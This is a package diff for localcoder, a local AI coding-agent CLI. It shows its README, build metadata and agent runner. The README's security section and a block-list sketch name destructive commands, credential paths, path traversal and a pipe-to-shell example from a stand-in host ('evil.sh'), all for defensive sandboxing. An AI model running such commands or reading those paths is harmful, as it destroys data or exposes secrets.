localcoder 0.1.0__tar.gz

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
@@ -0,0 +1,7 @@
__pycache__/
*.pyc
*.egg-info/
dist/
build/
.eggs/
*.log
@@ -0,0 +1,4 @@
Apache License 2.0
Copyright 2026 Anass Kartit

Licensed under the Apache License, Version 2.0
@@ -0,0 +1,187 @@
Metadata-Version: 2.4
Name: localcoder
Version: 0.1.0
Summary: Local AI coding agent — auto-installs, auto-serves, zero config. Works with Gemma 4, Qwen 3.5, and any model via llama.cpp or Ollama.
Project-URL: Homepage, https://github.com/AnassKartit/localcoder
Project-URL: Repository, https://github.com/AnassKartit/localcoder
Author: Anass Kartit
License-Expression: Apache-2.0
License-File: LICENSE
Keywords: agent,ai,coding,gemma4,llama.cpp,local,localcoder,ollama,qwen
Classifier: Development Status :: 4 - Beta
Classifier: Environment :: Console
Classifier: Intended Audience :: Developers
Classifier: License :: OSI Approved :: Apache Software License
Classifier: Programming Language :: Python :: 3
Classifier: Topic :: Software Development :: Code Generators
Requires-Python: >=3.10
Requires-Dist: huggingface-hub>=0.20
Requires-Dist: prompt-toolkit>=3.0
Requires-Dist: rich>=13.0
Description-Content-Type: text/markdown

# localcoder

**The local coding CLI that does the obvious things nobody else does.**

```bash
pipx install localcoder
```

I wanted to paste a screenshot into my coding assistant and see it inline. No tool did that locally. So I built one.

## Cost: $1.30/month vs $110/month

Running locally costs 85-141x less than cloud APIs:

| Usage | Claude Sonnet | Claude Opus | Local (US) | Local (India) |
|-------|--------------|-------------|------------|---------------|
| 4h/day | $55/mo | $91/mo | **$0.65/mo** | $0.29/mo |
| 8h/day | $110/mo | $183/mo | **$1.30/mo** | $0.58/mo |
| 10h/day | $137/mo | $228/mo | **$1.62/mo** | $0.72/mo |

*Based on: Gemma 4 26B at 47 tok/s, 30% active generation, M4 Pro 30W. Electricity: [worldpopulationreview.com](https://worldpopulationreview.com/country-rankings/cost-of-electricity-by-country). API: [anthropic.com](https://www.anthropic.com/pricing).*

**Annual savings: ~$1,300-$2,700** depending on usage and API choice.
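
The local-cost column is plain electricity arithmetic. A minimal sketch that reproduces it, assuming the quoted 30 W is the machine's average draw across a session and a US rate of about $0.18/kWh (the rate is an assumption chosen to match the table, not a figure stated here):

```python
def monthly_cost(hours_per_day, watts=30, price_per_kwh=0.18, days=30):
    """Electricity cost in dollars of running the model locally for a month."""
    kwh = watts / 1000 * hours_per_day * days
    return kwh * price_per_kwh

print(round(monthly_cost(8), 2))   # 8 h/day at US rates: ~$1.30/month
```

Swapping in roughly $0.08/kWh reproduces the India column to within a cent.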

## What's Actually Different

| Feature | localcoder | aider | OpenCode | Claude Code |
|---------|-----------|-------|----------|-------------|
| Paste image, see it inline | **Ctrl+V → shows in terminal** | no | no | cloud only |
| Voice input (local) | **Ctrl+R → Whisper, no cloud** | no | no | no |
| See GPU memory while coding | **/gpu → live stats** | no | no | no |
| Computer use (screenshot + click) | **built-in** | no | no | cloud only |
| Free GPU when it's slow | **/clean → before/after** | no | no | n/a |
| Browse HuggingFace models | **built-in model browser** | no | no | n/a |
| Works offline | **100%** | partial | partial | no |
| Cost | **$0.00** | API costs | API costs | $20/mo+ |

## Demo

```
❯ localcoder

localcoder · local AI coding agent · $0.00 forever

┌──────────────────────────────────────────────────┐
│                   LOCAL CODER                    │
└──────────────────────────────────────────────────┘

● Gemma 4 26B Q3_K_XL · llama.cpp · 128K · ● GPU · 47 tok/s
✓ offline · no API keys · no data sent

ctrl+r voice   ctrl+v image   /gpu stats   /clean free   /models switch

❯ /gpu
GPU   ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 12/16GB  3GB free
Swap  3GB   Pressure normal
Model Gemma 4 26B Q3_K_XL   GPU ctx 128K   footprint 2311MB
```

## Benchmark — M4 Pro 24GB

Real tests, real hardware, no synthetic benchmarks:

| Model | Size | tok/s | Notes |
|-------|------|-------|-------|
| **Gemma 4 26B** Q3_K_XL | 12.0GB | 47 | Best overall — vision + tool calling |
| **Qwen3.5-35B** MoE Q2_K_XL | 11.3GB | 46 | Best coding quality |
| **Qwen3.5-4B** Q4_K_XL | 2.7GB | 46 | Quick tasks |
| Gemma 4 E4B Q4_K_M | 5.0GB | 56 | Fastest — good for 16GB Macs |
| ~~Qwen3.5-27B Dense~~ | ~~13.4GB~~ | ~~7~~ | ~~Swap thrashing — don't use on 24GB~~ |

## Install

```bash
# macOS (Apple Silicon)
pipx install localcoder

# First run — auto-detects hardware, shows what fits, starts the model
localcoder
```

Needs [llama.cpp](https://github.com/ggml-org/llama.cpp) or [Ollama](https://ollama.com); the first-run wizard handles the setup.

## Commands

```bash
localcoder                          # interactive coding
localcoder -p "build a react app"   # one-shot
localcoder --yolo                   # auto-approve tools
```

### While Coding

| Command | What |
|---------|------|
| `Ctrl+V` | Paste + display image from clipboard |
| `Ctrl+R` | Toggle voice input (local Whisper) |
| `/gpu` | GPU memory, swap, model status |
| `/clean` | Free GPU memory with before/after |
| `/models` | Switch model (includes HuggingFace trending) |
| `/clear` | Clear conversation |

### Also works with Claude Code

Don't want localcoder's agent? Use Claude Code with your local model instead:

```bash
pip install localfit
localfit --launch claude --model gemma4-26b
```

One command: starts the model → configures Claude Code → launches it with the `--bare` flag.
See [localfit](https://github.com/AnassKartit/localfit) for details.

### GPU Toolkit (localfit inside)

```bash
localcoder --simulate            # will this model fit my GPU?
localcoder --fetch unsloth/...   # check all quants from HuggingFace
localcoder --bench               # benchmark models on YOUR hardware
localcoder --health              # GPU health dashboard
localcoder --config opencode     # auto-configure OpenCode for local models
localcoder --config aider        # auto-configure aider
```

Also available standalone: `pipx install localfit`
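
`--simulate` is a memory-budget question: do the weights plus KV cache fit in what the OS leaves free? The actual heuristic is not part of this diff; a rough sketch under assumed reserve and cache sizes:

```python
def fits(model_gb, kv_cache_gb, ram_gb, os_reserve_gb=4.0):
    """Rough fit check: weights + KV cache must fit in RAM left after the OS.
    The 4 GB reserve and cache size are illustrative assumptions."""
    return model_gb + kv_cache_gb <= ram_gb - os_reserve_gb

print(fits(12.0, 3.0, 24))  # Gemma 4 26B Q3_K_XL on a 24 GB Mac: True
print(fits(12.0, 3.0, 16))  # same model on a 16 GB Mac: False
```

A real check also has to account for swap pressure, which is why the 13.4 GB dense 27B is crossed out in the benchmark table despite nominally fitting.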
149
+
150
+ ## Hardware
151
+
152
+ | Mac | RAM | Best Model | Speed |
153
+ |-----|-----|-----------|-------|
154
+ | Air M2 | 8 GB | Qwen 3.5 4B | 50 tok/s |
155
+ | Air M3 | 16 GB | Gemma 4 E4B | 57 tok/s |
156
+ | **Pro M4** | **24 GB** | **Gemma 4 26B Q3_K_XL** | **47 tok/s** |
157
+
158
+ ## License
159
+
160
+ Apache-2.0
161
+
162
+ ## Security
163
+
164
+ Sandbox mode is **ON by default**. Protects against destructive model outputs:
165
+
166
+ | Blocked | Examples |
167
+ |---------|----------|
168
+ | Destructive commands | `rm -rf`, `sudo`, `kill`, `mkfs` |
169
+ | Pipe to shell | `curl ... \| bash`, `wget ... \| sh` |
170
+ | Protected paths | `~/.ssh`, `~/.aws`, `~/.env`, `/etc/` |
171
+ | Path traversal | `../../etc/passwd` |
172
+ | Computer use | Disabled in sandbox |
173
+
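The screening code itself is not included in this diff. A minimal sketch of how the table above could map to a pattern check (the patterns and helper name here are illustrative, not localcoder's actual implementation):

```python
import re

# Illustrative block-list; localcoder's real rules are not shown in this diff.
BLOCKED_PATTERNS = [
    r"\brm\s+-rf\b", r"\bsudo\b", r"\bmkfs\b",  # destructive commands
    r"\|\s*(bash|sh)\b",                        # pipe to shell
    r"\.\./",                                   # path traversal
]
PROTECTED_PREFIXES = ("~/.ssh", "~/.aws", "/etc/")

def is_blocked(cmd: str) -> bool:
    """Return True if a model-proposed shell command should be refused."""
    if any(re.search(p, cmd) for p in BLOCKED_PATTERNS):
        return True
    return any(tok.startswith(PROTECTED_PREFIXES) for tok in cmd.split())

print(is_blocked("curl https://evil.sh | bash"))  # True
print(is_blocked("ls -la src/"))                  # False
```
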
```bash
localcoder                 # sandboxed (default)
localcoder --yolo          # auto-approve, but sandbox stays ON
localcoder --unrestricted  # sandbox OFF (shows a warning)
```

Approved tools are remembered across sessions (`~/.localcoder/approved_tools.json`).
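
Remembering approvals needs nothing more than a JSON list on disk. A hypothetical sketch (the real on-disk format of `approved_tools.json` is not shown in this diff):

```python
import json
import os
import tempfile

def load_approved(path):
    """Read the remembered tool approvals; an empty set if none yet."""
    try:
        with open(path) as f:
            return set(json.load(f))
    except (FileNotFoundError, json.JSONDecodeError):
        return set()

def approve(path, tool):
    """Record a newly approved tool and persist the full set."""
    tools = load_approved(path)
    tools.add(tool)
    with open(path, "w") as f:
        json.dump(sorted(tools), f)

# Demo against a throwaway directory rather than ~/.localcoder
path = os.path.join(tempfile.mkdtemp(), "approved_tools.json")
approve(path, "bash")
approve(path, "write_file")
print(sorted(load_approved(path)))  # ['bash', 'write_file']
```
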

## Tests

```bash
pip install pytest
pytest tests/ -v   # 19 tests
```
@@ -0,0 +1,36 @@
[build-system]
requires = ["hatchling"]
build-backend = "hatchling.build"

[project]
name = "localcoder"
version = "0.1.0"
description = "Local AI coding agent — auto-installs, auto-serves, zero config. Works with Gemma 4, Qwen 3.5, and any model via llama.cpp or Ollama."
readme = "README.md"
license = "Apache-2.0"
requires-python = ">=3.10"
authors = [{ name = "Anass Kartit" }]
keywords = ["localcoder", "ai", "coding", "agent", "llama.cpp", "ollama", "gemma4", "qwen", "local"]
classifiers = [
    "Development Status :: 4 - Beta",
    "Environment :: Console",
    "Intended Audience :: Developers",
    "Topic :: Software Development :: Code Generators",
    "License :: OSI Approved :: Apache Software License",
    "Programming Language :: Python :: 3",
]
dependencies = [
    "rich>=13.0",
    "prompt_toolkit>=3.0",
    "huggingface-hub>=0.20",
]

[project.scripts]
localcoder = "localcoder.cli:main"

[tool.hatch.build.targets.wheel]
packages = ["src/localcoder"]

[project.urls]
Homepage = "https://github.com/AnassKartit/localcoder"
Repository = "https://github.com/AnassKartit/localcoder"
@@ -0,0 +1,2 @@
"""localcoder — Local AI coding agent. Works with Gemma 4, Qwen 3.5, and any model."""
__version__ = "0.1.0"
@@ -0,0 +1,2 @@
from localcoder.cli import main
main()
@@ -0,0 +1,35 @@
"""Agent runner — delegates to the localcoder agent script."""
import os
import sys


def run_agent(api_base, model, args):
    """Run the localcoder agent with the given config."""
    os.environ["GEMMA_API_BASE"] = api_base
    os.environ["GEMMA_MODEL"] = model

    # Find the agent script — bundled with the package
    script = os.path.join(os.path.dirname(__file__), "localcoder_agent.py")
    if not os.path.exists(script):
        # Fallback: development checkout (pre-packaging layout)
        script = os.path.expanduser("~/Projects/gemma4-research/localcoder")

    if not os.path.exists(script):
        from rich.console import Console
        Console().print("[red]Agent script not found.[/]")
        return

    # Build argv for the agent, forwarding the relevant CLI flags
    cmd = [sys.executable, script]
    if args.prompt:
        cmd += ["-p", args.prompt]
    if args.cont:
        cmd += ["-c"]
    if args.model:
        cmd += ["-m", model]
    if args.yolo or args.bypass:
        cmd += ["--yolo"]
    if args.ask:
        cmd += ["--ask"]
    if args.api:
        cmd += ["--api", api_base]

    # Replace the current process with the agent; cmd[0] becomes its argv[0]
    os.execvp(sys.executable, cmd)
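
The flag-forwarding above can be exercised without `os.execvp` replacing the process. An abridged, hypothetical rework of the argv construction, for illustration only:

```python
import sys
from types import SimpleNamespace

def build_cmd(script, api_base, args):
    """Mirror run_agent's argv construction (abridged sketch, not the packaged code)."""
    cmd = [sys.executable, script]
    if args.prompt:
        cmd += ["-p", args.prompt]
    if args.cont:
        cmd += ["-c"]
    if args.yolo or args.bypass:
        cmd += ["--yolo"]
    if args.api:
        cmd += ["--api", api_base]
    return cmd

# Stand-in for the parsed CLI namespace
args = SimpleNamespace(prompt="fix the tests", cont=False, yolo=True, bypass=False, api=True)
print(build_cmd("agent.py", "http://127.0.0.1:8080/v1", args)[1:])
# ['agent.py', '-p', 'fix the tests', '--yolo', '--api', 'http://127.0.0.1:8080/v1']
```
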